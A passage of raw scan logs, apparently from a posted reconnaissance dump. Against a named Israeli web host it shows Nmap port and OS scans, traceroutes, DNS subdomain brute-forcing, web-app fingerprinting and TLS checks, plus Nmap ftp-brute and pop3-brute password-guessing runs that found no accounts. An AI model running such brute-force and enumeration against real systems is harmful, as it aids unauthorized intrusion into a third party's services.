  2873. SCAN(V=7.70SVN%E=4%D=1/23%OT=21%CT=1%CU=%PV=N%DS=17%DC=T%G=N%TM=5C483E64%P=x86_64-unknown-linux-gnu)
  2874. SEQ(SP=100%GCD=1%ISR=108%TI=Z%II=I%TS=A)
  2875. SEQ(SP=100%GCD=1%ISR=108%TI=Z%TS=A)
  2876. OPS(O1=M4B3ST11NW7%O2=M4B3ST11NW7%O3=M4B3NNT11NW7%O4=M4B3ST11NW7%O5=M4B3ST11NW7%O6=M4B3ST11)
  2877. WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6=3890)
  2878. ECN(R=Y%DF=Y%TG=40%W=3908%O=M4B3NNSNW7%CC=Y%Q=)
  2879. T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
  2880. T2(R=N)
  2881. T3(R=N)
  2882. T4(R=N)
  2883. T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
  2884. T6(R=N)
  2885. T7(R=N)
  2886. U1(R=N)
  2887. IE(R=Y%DFI=N%TG=40%CD=S)
  2888.  
  2889. Uptime guess: 25.505 days (since Fri Dec 28 17:06:06 2018)
  2890. Network Distance: 17 hops
  2891. TCP Sequence Prediction: Difficulty=256 (Good luck!)
  2892. IP ID Sequence Generation: All zeros
  2893. Service Info: OSs: Unix, Linux; CPE: cpe:/o:redhat:enterprise_linux:7
  2894.  
  2895. TRACEROUTE (using proto 1/icmp)
  2896. HOP RTT ADDRESS
  2897. 1 145.48 ms 10.246.200.1
  2898. 2 148.22 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
  2899. 3 147.04 ms vlan299.bb1.sof1.bg.m247.com (176.10.83.34)
  2900. 4 145.67 ms sfia-b2-link.telia.net (62.115.148.144)
  2901. 5 178.68 ms 62.115.119.76
  2902. 6 178.15 ms 62.115.133.79
  2903. 7 177.96 ms ffm-b1-link.telia.net (62.115.116.158)
  2904. 8 178.71 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
  2905. 9 ...
  2906. 10 231.84 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
  2907. 11 229.29 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
  2908. 12 230.00 ms 212.143.7.247
  2909. 13 230.16 ms core2-rha-2-0-0-core2-hfa-5-0-7.nv.net.il (212.143.12.119)
  2910. 14 235.77 ms po231.srvc3.rha.nv.net.il (212.143.201.190)
  2911. 15 231.62 ms 82.166.37.254
  2912. 16 232.69 ms 62-90-134-178.barak.net.il (62.90.134.178)
  2913. 17 231.57 ms server.webid.co.il (62.90.134.182)
  2914.  
  2915. NSE: Script Post-scanning.
  2916. NSE: Starting runlevel 1 (of 3) scan.
  2917. Initiating NSE at 05:13
  2918. Completed NSE at 05:13, 0.00s elapsed
  2919. NSE: Starting runlevel 2 (of 3) scan.
  2920. Initiating NSE at 05:13
  2921. Completed NSE at 05:13, 0.00s elapsed
  2922. NSE: Starting runlevel 3 (of 3) scan.
  2923. Initiating NSE at 05:13
  2924. Completed NSE at 05:13, 0.00s elapsed
  2925. Read data files from: /usr/local/bin/../share/nmap
  2926. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2927. Nmap done: 1 IP address (1 host up) scanned in 285.87 seconds
  2928. Raw packets sent: 100 (7.834KB) | Rcvd: 1149 (559.312KB)
  2929. #######################################################################################################################################
  2930. Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 05:13 EST
  2931. NSE: Loaded 149 scripts for scanning.
  2932. NSE: Script Pre-scanning.
  2933. Initiating NSE at 05:13
  2934. Completed NSE at 05:13, 0.00s elapsed
  2935. Initiating NSE at 05:13
  2936. Completed NSE at 05:13, 0.00s elapsed
  2937. Initiating NSE at 05:13
  2938. Completed NSE at 05:13, 0.00s elapsed
  2939. Initiating Parallel DNS resolution of 1 host. at 05:13
  2940. Completed Parallel DNS resolution of 1 host. at 05:13, 0.02s elapsed
  2941. Initiating UDP Scan at 05:13
  2942. Scanning babylon-woodline.co.il (62.90.134.182) [13 ports]
  2943. Discovered open port 53/udp on 62.90.134.182
  2944. Completed UDP Scan at 05:14, 4.61s elapsed (13 total ports)
  2945. Initiating Service scan at 05:14
  2946. Scanning 1 service on babylon-woodline.co.il (62.90.134.182)
  2947. Completed Service scan at 05:14, 0.23s elapsed (1 service on 1 host)
  2948. Initiating OS detection (try #1) against babylon-woodline.co.il (62.90.134.182)
  2949. Retrying OS detection (try #2) against babylon-woodline.co.il (62.90.134.182)
  2950. Initiating Traceroute at 05:14
  2951. Completed Traceroute at 05:14, 7.22s elapsed
  2952. Initiating Parallel DNS resolution of 1 host. at 05:14
  2953. Completed Parallel DNS resolution of 1 host. at 05:14, 0.02s elapsed
  2954. NSE: Script scanning 62.90.134.182.
  2955. Initiating NSE at 05:14
  2956. Completed NSE at 05:14, 0.47s elapsed
  2957. Initiating NSE at 05:14
  2958. Completed NSE at 05:14, 0.00s elapsed
  2959. Initiating NSE at 05:14
  2960. Completed NSE at 05:14, 0.00s elapsed
  2961. Nmap scan report for babylon-woodline.co.il (62.90.134.182)
  2962. Host is up (0.23s latency).
  2963. rDNS record for 62.90.134.182: server.webid.co.il
  2964.  
  2965. PORT STATE SERVICE VERSION
  2966. 53/udp open domain ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
  2967. | dns-nsid:
  2968. |_ bind.version: 9.9.4-RedHat-9.9.4-61.el7
  2969. 67/udp closed dhcps
  2970. 68/udp closed dhcpc
  2971. 69/udp closed tftp
  2972. 88/udp closed kerberos-sec
  2973. 123/udp closed ntp
  2974. 137/udp filtered netbios-ns
  2975. 138/udp filtered netbios-dgm
  2976. 139/udp closed netbios-ssn
  2977. 162/udp closed snmptrap
  2978. 389/udp closed ldap
  2979. 520/udp closed route
  2980. 2049/udp closed nfs
  2981. Too many fingerprints match this host to give specific OS details
  2982. Network Distance: 17 hops
  2983. Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
  2984.  
  2985. TRACEROUTE (using port 138/udp)
  2986. HOP RTT ADDRESS
  2987. 1 ... 7
  2988. 8 142.93 ms 10.246.200.1
  2989. 9 ... 10
  2990. 11 148.28 ms 10.246.200.1
  2991. 12 143.06 ms 10.246.200.1
  2992. 13 143.06 ms 10.246.200.1
  2993. 14 143.06 ms 10.246.200.1
  2994. 15 143.05 ms 10.246.200.1
  2995. 16 143.05 ms 10.246.200.1
  2996. 17 143.07 ms 10.246.200.1
  2997. 18 ...
  2998. 19 145.09 ms 10.246.200.1
  2999. 20 143.55 ms 10.246.200.1
  3000. 21 ... 28
  3001. 29 147.56 ms 10.246.200.1
  3002. 30 144.82 ms 10.246.200.1
  3003.  
  3004. NSE: Script Post-scanning.
  3005. Initiating NSE at 05:14
  3006. Completed NSE at 05:14, 0.00s elapsed
  3007. Initiating NSE at 05:14
  3008. Completed NSE at 05:14, 0.00s elapsed
  3009. Initiating NSE at 05:14
  3010. Completed NSE at 05:14, 0.00s elapsed
  3011. Read data files from: /usr/local/bin/../share/nmap
  3012. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  3013. Nmap done: 1 IP address (1 host up) scanned in 17.32 seconds
  3014. Raw packets sent: 123 (5.705KB) | Rcvd: 1819 (484.907KB)
  3015. #######################################################################################################################################
  3016. Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 05:14 EST
  3017. Nmap scan report for babylon-woodline.co.il (62.90.134.182)
  3018. Host is up (0.23s latency).
  3019. rDNS record for 62.90.134.182: server.webid.co.il
  3020. Not shown: 17 closed ports, 1 filtered port
  3021. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  3022. PORT STATE SERVICE
  3023. 21/tcp open ftp
  3024. 53/tcp open domain
  3025. 80/tcp open http
  3026. 110/tcp open pop3
  3027. 443/tcp open https
  3028. 993/tcp open imaps
  3029. 3306/tcp open mysql
  3030. 8080/tcp open http-proxy
  3031. #######################################################################################################################################
  3032. Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:21 EST
  3033. Nmap scan report for server.webid.co.il (62.90.134.182)
  3034. Host is up (0.23s latency).
  3035. Not shown: 336 closed ports, 124 filtered ports
  3036. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  3037. PORT STATE SERVICE
  3038. 21/tcp open ftp
  3039. 53/tcp open domain
  3040. 80/tcp open http
  3041. 110/tcp open pop3
  3042. 143/tcp open imap
  3043. 443/tcp open https
  3044. 465/tcp open smtps
  3045. 587/tcp open submission
  3046. 993/tcp open imaps
  3047. 995/tcp open pop3s
  3048. 2000/tcp open cisco-sccp
  3049. 2222/tcp open EtherNetIP-1
  3050. 3306/tcp open mysql
  3051. 5060/tcp open sip
  3052. 8080/tcp open http-proxy
  3053. 8081/tcp open blackice-icecap
  3054. #######################################################################################################################################
  3055. Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:21 EST
  3056. Nmap scan report for server.webid.co.il (62.90.134.182)
  3057. Host is up (0.21s latency).
  3058. Not shown: 10 closed ports, 2 filtered ports
  3059. PORT STATE SERVICE
  3060. 53/udp open domain
  3061. ######################################################################################################################################
  3062. Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:21 EST
  3063. NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
  3064. NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
  3065. NSE: [ftp-brute] passwords: Time limit 3m00s exceeded.
  3066. Nmap scan report for server.webid.co.il (62.90.134.182)
  3067. Host is up (0.23s latency).
  3068.  
  3069. PORT STATE SERVICE VERSION
  3070. 21/tcp open ftp ProFTPD
  3071. | ftp-brute:
  3072. | Accounts: No valid accounts found
  3073. |_ Statistics: Performed 2604 guesses in 180 seconds, average tps: 14.2
  3074. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  3075. Device type: general purpose|storage-misc|firewall|VoIP phone
  3076. Running (JUST GUESSING): Linux 2.6.X|3.X (91%), Synology DiskStation Manager 5.X (90%), WatchGuard Fireware 11.X (89%), Grandstream embedded (85%)
  3077. OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/o:watchguard:fireware:11.8 cpe:/h:grandstream:gxv3275
  3078. Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 or 3.10 (89%), WatchGuard Fireware 11.8 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
  3079. No exact OS matches for host (test conditions non-ideal).
  3080. Network Distance: 17 hops
  3081. Service Info: OS: Unix
  3082.  
  3083. TRACEROUTE (using port 21/tcp)
  3084. HOP RTT ADDRESS
  3085. 1 146.37 ms 10.246.200.1
  3086. 2 146.44 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
  3087. 3 146.43 ms 176.10.83.34
  3088. 4 146.42 ms sfia-b2-link.telia.net (62.115.148.144)
  3089. 5 178.37 ms prag-bb1-link.telia.net (80.91.247.82)
  3090. 6 178.42 ms ffm-bb3-link.telia.net (62.115.121.118)
  3091. 7 178.45 ms ffm-b1-link.telia.net (62.115.121.7)
  3092. 8 179.25 ms 80.239.196.190
  3093. 9 ...
  3094. 10 233.20 ms gw2-3-1-4-hfa-gw2-fra.nv.net.il (212.143.12.76)
  3095. 11 235.52 ms 212.143.7.22
  3096. 12 237.42 ms core1-rha2-0-0-core1-hfa.nv.net.il (207.232.0.17)
  3097. 13 236.62 ms core1-rha-1-0-0-core1-hfa-5-0-7.nv.net.il (212.143.12.117)
  3098. 14 237.42 ms 212.143.201.190
  3099. 15 230.82 ms 82-166-37-254.barak-online.net (82.166.37.254)
  3100. 16 231.70 ms 62-90-134-178.barak.net.il (62.90.134.178)
  3101. 17 232.39 ms server.webid.co.il (62.90.134.182)
  3102. ######################################################################################################################################
  3103. Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:25 EST
  3104. Nmap scan report for server.webid.co.il (62.90.134.182)
  3105. Host is up (0.23s latency).
  3106.  
  3107. PORT STATE SERVICE VERSION
  3108. 53/tcp open domain ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
  3109. |_dns-fuzz: Server didn't response to our probe, can't fuzz
  3110. | dns-nsec-enum:
  3111. |_ No NSEC records found
  3112. | dns-nsec3-enum:
  3113. |_ DNSSEC NSEC3 not supported
  3114. | dns-nsid:
  3115. |_ bind.version: 9.9.4-RedHat-9.9.4-61.el7
  3116. |_dns-zone-transfer: ERROR: Script execution failed (use -d to debug)
  3117. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  3118. Device type: general purpose|firewall|storage-misc|VoIP phone
  3119. Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
  3120. OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
  3121. Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.32 or 3.10 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
  3122. No exact OS matches for host (test conditions non-ideal).
  3123. Network Distance: 17 hops
  3124. Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
  3125.  
  3126. Host script results:
  3127. | dns-blacklist:
  3128. | SPAM
  3129. |_ l2.apews.org - SPAM
  3130. | dns-brute:
  3131. | DNS Brute-force hostnames:
  3132. | ns1.webid.co.il - 62.90.134.182
  3133. | ns2.webid.co.il - 212.150.246.99
  3134. | mail.webid.co.il - 62.90.134.182
  3135. | www.webid.co.il - 62.90.134.182
  3136. | cms.webid.co.il - 62.90.134.182
  3137. | ftp.webid.co.il - 62.90.134.182
  3138. | server.webid.co.il - 62.90.134.182
  3139. |_ smtp.webid.co.il - 62.90.134.182
  3140.  
  3141. TRACEROUTE (using port 53/tcp)
  3142. HOP RTT ADDRESS
  3143. 1 145.16 ms 10.246.200.1
  3144. 2 145.25 ms 193.9.115.113
  3145. 3 145.22 ms vlan299.bb1.sof1.bg.m247.com (176.10.83.34)
  3146. 4 145.25 ms sfia-b2-link.telia.net (62.115.148.144)
  3147. 5 177.07 ms 80.91.253.248
  3148. 6 177.12 ms ffm-bb3-link.telia.net (62.115.121.118)
  3149. 7 180.34 ms ffm-b1-link.telia.net (62.115.116.160)
  3150. 8 180.31 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
  3151. 9 ...
  3152. 10 231.35 ms 212.143.12.76
  3153. 11 232.67 ms core1-0-1-0-2-gw2.hfa.nv.net.il (212.143.7.41)
  3154. 12 233.83 ms core2-rha-2-0-0-core2-hfa-5-0-7.nv.net.il (212.143.12.119)
  3155. 13 235.90 ms 212.143.201.205
  3156. 14 235.84 ms po221.srvc3.rha.nv.net.il (212.143.201.188)
  3157. 15 231.43 ms 82-166-37-254.barak-online.net (82.166.37.254)
  3158. 16 232.20 ms 62-90-134-178.barak.net.il (62.90.134.178)
  3159. 17 233.34 ms server.webid.co.il (62.90.134.182)
  3160. #######################################################################################################################################
  3161. wig - WebApp Information Gatherer
  3162.  
  3163.  
  3164. Scanning http://62.90.134.182...
  3165. _________________________________________ SITE INFO _________________________________________
  3166. IP Title
  3167. 62.90.134.182
  3168.  
  3169. __________________________________________ VERSION __________________________________________
  3170. Name Versions Type
  3171. Roundcube CMS
  3172. phpMyAdmin CMS
  3173. Apache 2.4.10 | 2.4.11 | 2.4.12 | 2.4.4 | 2.4.5 | 2.4.6 | 2.4.7 Platform
  3174. 2.4.8 | 2.4.9
  3175.  
  3176. _____________________________________________________________________________________________
  3177. Time: 29.4 sec Urls: 446 Fingerprints: 40401
  3178. #######################################################################################################################################
  3179. HTTP/1.1 200 OK
  3180. Server: nginx
  3181. Date: Wed, 23 Jan 2019 09:27:50 GMT
  3182. Content-Type: text/html
  3183. Content-Length: 43
  3184. Connection: keep-alive
  3185. Vary: Accept-Encoding
  3186. X-Accel-Version: 0.01
  3187. Last-Modified: Mon, 18 Jun 2018 11:43:36 GMT
  3188. ETag: "2b-56ee9136e8a00"
  3189. Accept-Ranges: bytes
  3190. Vary: User-Agent
  3191. #######################################################################################################################################
  3192. Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:27 EST
  3193. NSE: [pop3-brute] usernames: Time limit 3m00s exceeded.
  3194. NSE: [pop3-brute] usernames: Time limit 3m00s exceeded.
  3195. NSE: [pop3-brute] passwords: Time limit 3m00s exceeded.
  3196. Nmap scan report for server.webid.co.il (62.90.134.182)
  3197. Host is up (0.23s latency).
  3198.  
  3199. PORT STATE SERVICE VERSION
  3200. 110/tcp open pop3 Dovecot DirectAdmin pop3d
  3201. | pop3-brute:
  3202. | Accounts: No valid accounts found
  3203. |_ Statistics: Performed 225 guesses in 183 seconds, average tps: 1.3
  3204. |_pop3-capabilities: CAPA UIDL RESP-CODES STLS USER AUTH-RESP-CODE SASL(PLAIN) PIPELINING TOP
  3205. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  3206. Device type: general purpose|firewall|storage-misc|VoIP phone
  3207. Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
  3208. OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
  3209. Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.32 or 3.10 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
  3210. No exact OS matches for host (test conditions non-ideal).
  3211. Network Distance: 16 hops
  3212.  
  3213. TRACEROUTE (using port 110/tcp)
  3214. HOP RTT ADDRESS
  3215. 1 146.19 ms 10.246.200.1
  3216. 2 146.97 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
  3217. 3 174.77 ms 176.10.83.34
  3218. 4 146.97 ms sfia-b2-link.telia.net (62.115.148.144)
  3219. 5 178.41 ms win-bb2-link.telia.net (62.115.119.76)
  3220. 6 179.05 ms ffm-bb4-link.telia.net (62.115.133.79)
  3221. 7 178.40 ms ffm-b1-link.telia.net (62.115.121.1)
  3222. 8 179.09 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
  3223. 9 ...
  3224. 10 233.92 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
  3225. 11 231.01 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
  3226. 12 231.03 ms 212.143.7.39
  3227. 13 232.28 ms po221.srvc3.rha.nv.net.il (212.143.201.188)
  3228. 14 232.24 ms 82.166.37.254
  3229. 15 233.54 ms 62-90-134-178.barak.net.il (62.90.134.178)
  3230. 16 232.25 ms server.webid.co.il (62.90.134.182)
  3231. #######################################################################################################################################
  3232.  
  3233.  
  3234.  
  3235. AVAILABLE PLUGINS
  3236. -----------------
  3237.  
  3238. PluginSessionRenegotiation
  3239. PluginOpenSSLCipherSuites
  3240. PluginHSTS
  3241. PluginCertInfo
  3242. PluginCompression
  3243. PluginSessionResumption
  3244. PluginHeartbleed
  3245. PluginChromeSha1Deprecation
  3246.  
  3247.  
  3248.  
  3249. CHECKING HOST(S) AVAILABILITY
  3250. -----------------------------
  3251.  
  3252. 62.90.134.182:443 => 62.90.134.182:443
  3253.  
  3254.  
  3255.  
  3256. SCAN RESULTS FOR 62.90.134.182:443 - 62.90.134.182:443
  3257. ------------------------------------------------------
  3258.  
  3259. * Deflate Compression:
  3260. OK - Compression disabled
  3261.  
  3262. * Session Renegotiation:
  3263. Client-initiated Renegotiations: OK - Rejected
  3264. Secure Renegotiation: OK - Supported
  3265.  
  3266. * OpenSSL Heartbleed:
  3267. OK - Not vulnerable to Heartbleed
  3268.  
  3269. * Certificate - Content:
  3270. SHA1 Fingerprint: 2e3f643e5d11a459bd85ab36e5e5593f04c8e51f
  3271. Common Name: localhost
  3272. Issuer: localhost
  3273. Serial Number: 99F758FFACDEEDCB
  3274. Not Before: Sep 20 10:18:07 2014 GMT
  3275. Not After: Feb 4 10:18:07 2042 GMT
  3276. Signature Algorithm: sha1WithRSAEncryption
  3277. Public Key Algorithm: rsaEncryption
  3278. Key Size: 2048 bit
  3279. Exponent: 65537 (0x10001)
  3280.  
  3281. * Certificate - Trust:
  3282. Hostname Validation: FAILED - Certificate does NOT match 62.90.134.182
  3283. Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
  3284. Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: self signed certificate
  3285. Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
  3286. Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
  3287. Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: self signed certificate
  3288. Certificate Chain Received: ['localhost', 'COMODO High-Assurance Secure Server CA', 'AddTrust External CA Root', 'GlobalSign Root CA', 'thawte Primary Root CA', 'VeriSign Class 3 Secure Server CA - G3', 'VeriSign Class 3 Public Primary Certification Authority - G5']
  3289.  
  3290. * Certificate - OCSP Stapling:
  3291. NOT SUPPORTED - Server did not send back an OCSP response.
  3292.  
  3293. * SSLV2 Cipher Suites:
  3294. Server rejected all cipher suites.
  3295.  
  3296. * Session Resumption:
  3297. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  3298. With TLS Session Tickets: OK - Supported
  3299.  
  3300. * TLSV1_2 Cipher Suites:
  3301. Preferred:
  3302. ECDHE-RSA-AES128-GCM-SHA256 ECDH-256 bits 128 bits HTTP 200 OK
  3303. Accepted:
  3304. ECDHE-RSA-AES256-SHA384 ECDH-256 bits 256 bits HTTP 200 OK
  3305. ECDHE-RSA-AES256-SHA ECDH-256 bits 256 bits HTTP 200 OK
  3306. ECDHE-RSA-AES256-GCM-SHA384 ECDH-256 bits 256 bits HTTP 200 OK
  3307. DHE-RSA-CAMELLIA256-SHA DH-2048 bits 256 bits HTTP 200 OK
  3308. DHE-RSA-AES256-SHA256 DH-2048 bits 256 bits HTTP 200 OK
  3309. DHE-RSA-AES256-SHA DH-2048 bits 256 bits HTTP 200 OK
  3310. DHE-RSA-AES256-GCM-SHA384 DH-2048 bits 256 bits HTTP 200 OK
  3311. CAMELLIA256-SHA - 256 bits HTTP 200 OK
  3312. AES256-SHA256 - 256 bits HTTP 200 OK
  3313. AES256-SHA - 256 bits HTTP 200 OK
  3314. AES256-GCM-SHA384 - 256 bits HTTP 200 OK
  3315. ECDHE-RSA-AES128-SHA256 ECDH-256 bits 128 bits HTTP 200 OK
  3316. ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
  3317. ECDHE-RSA-AES128-GCM-SHA256 ECDH-256 bits 128 bits HTTP 200 OK
  3318. DHE-RSA-CAMELLIA128-SHA DH-2048 bits 128 bits HTTP 200 OK
  3319. DHE-RSA-AES128-SHA256 DH-2048 bits 128 bits HTTP 200 OK
  3320. DHE-RSA-AES128-SHA DH-2048 bits 128 bits HTTP 200 OK
  3321. DHE-RSA-AES128-GCM-SHA256 DH-2048 bits 128 bits HTTP 200 OK
  3322. CAMELLIA128-SHA - 128 bits HTTP 200 OK
  3323. AES128-SHA256 - 128 bits HTTP 200 OK
  3324. AES128-SHA - 128 bits HTTP 200 OK
  3325. AES128-GCM-SHA256 - 128 bits HTTP 200 OK
  3326. ECDHE-RSA-DES-CBC3-SHA ECDH-256 bits 112 bits HTTP 200 OK
  3327. DES-CBC3-SHA - 112 bits HTTP 200 OK
  3328.  
  3329. * TLSV1_1 Cipher Suites:
  3330. Preferred:
  3331. ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
  3332. Accepted:
  3333. ECDHE-RSA-AES256-SHA ECDH-256 bits 256 bits HTTP 200 OK
  3334. DHE-RSA-CAMELLIA256-SHA DH-2048 bits 256 bits HTTP 200 OK
  3335. DHE-RSA-AES256-SHA DH-2048 bits 256 bits HTTP 200 OK
  3336. CAMELLIA256-SHA - 256 bits HTTP 200 OK
  3337. AES256-SHA - 256 bits HTTP 200 OK
  3338. ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
  3339. DHE-RSA-CAMELLIA128-SHA DH-2048 bits 128 bits HTTP 200 OK
  3340. DHE-RSA-AES128-SHA DH-2048 bits 128 bits HTTP 200 OK
  3341. CAMELLIA128-SHA - 128 bits HTTP 200 OK
  3342. AES128-SHA - 128 bits HTTP 200 OK
  3343. ECDHE-RSA-DES-CBC3-SHA ECDH-256 bits 112 bits HTTP 200 OK
  3344. DES-CBC3-SHA - 112 bits HTTP 200 OK
  3345.  
  3346. * TLSV1 Cipher Suites:
  3347. Preferred:
  3348. ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
  3349. Accepted:
  3350. ECDHE-RSA-AES256-SHA ECDH-256 bits 256 bits HTTP 200 OK
  3351. DHE-RSA-CAMELLIA256-SHA DH-2048 bits 256 bits HTTP 200 OK
  3352. DHE-RSA-AES256-SHA DH-2048 bits 256 bits HTTP 200 OK
  3353. CAMELLIA256-SHA - 256 bits HTTP 200 OK
  3354. AES256-SHA - 256 bits HTTP 200 OK
  3355. ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
  3356. DHE-RSA-CAMELLIA128-SHA DH-2048 bits 128 bits HTTP 200 OK
  3357. DHE-RSA-AES128-SHA DH-2048 bits 128 bits HTTP 200 OK
  3358. CAMELLIA128-SHA - 128 bits HTTP 200 OK
  3359. AES128-SHA - 128 bits HTTP 200 OK
  3360. ECDHE-RSA-DES-CBC3-SHA ECDH-256 bits 112 bits HTTP 200 OK
  3361. DES-CBC3-SHA - 112 bits HTTP 200 OK
  3362.  
  3363. * SSLV3 Cipher Suites:
  3364. Server rejected all cipher suites.
  3365.  
  3366.  
  3367.  
  3368. SCAN COMPLETED IN 19.16 S
  3369. -------------------------
  3370. Version: 1.11.12-static
  3371. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  3372.  
  3373. Connected to 62.90.134.182
  3374.  
  3375. Testing SSL server 62.90.134.182 on port 443 using SNI name 62.90.134.182
  3376.  
  3377. TLS Fallback SCSV:
  3378. Server supports TLS Fallback SCSV
  3379.  
  3380. TLS renegotiation:
  3381. Secure session renegotiation supported
  3382.  
  3383. TLS Compression:
  3384. Compression disabled
  3385.  
  3386. Heartbleed:
  3387. TLS 1.2 not vulnerable to heartbleed
  3388. TLS 1.1 not vulnerable to heartbleed
  3389. TLS 1.0 not vulnerable to heartbleed
  3390.  
  3391. Supported Server Cipher(s):
  3392. Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  3393. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  3394. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
  3395. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
  3396. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  3397. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  3398. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  3399. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  3400. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
  3401. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  3402. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
  3403. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  3404. Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
  3405. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
  3406. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
  3407. Accepted TLSv1.2 128 bits AES128-SHA256
  3408. Accepted TLSv1.2 256 bits AES256-SHA256
  3409. Accepted TLSv1.2 128 bits AES128-SHA
  3410. Accepted TLSv1.2 256 bits AES256-SHA
  3411. Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
  3412. Accepted TLSv1.2 256 bits CAMELLIA256-SHA
  3413. Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
  3414. Accepted TLSv1.2 128 bits CAMELLIA128-SHA
  3415. Accepted TLSv1.2 112 bits DES-CBC3-SHA
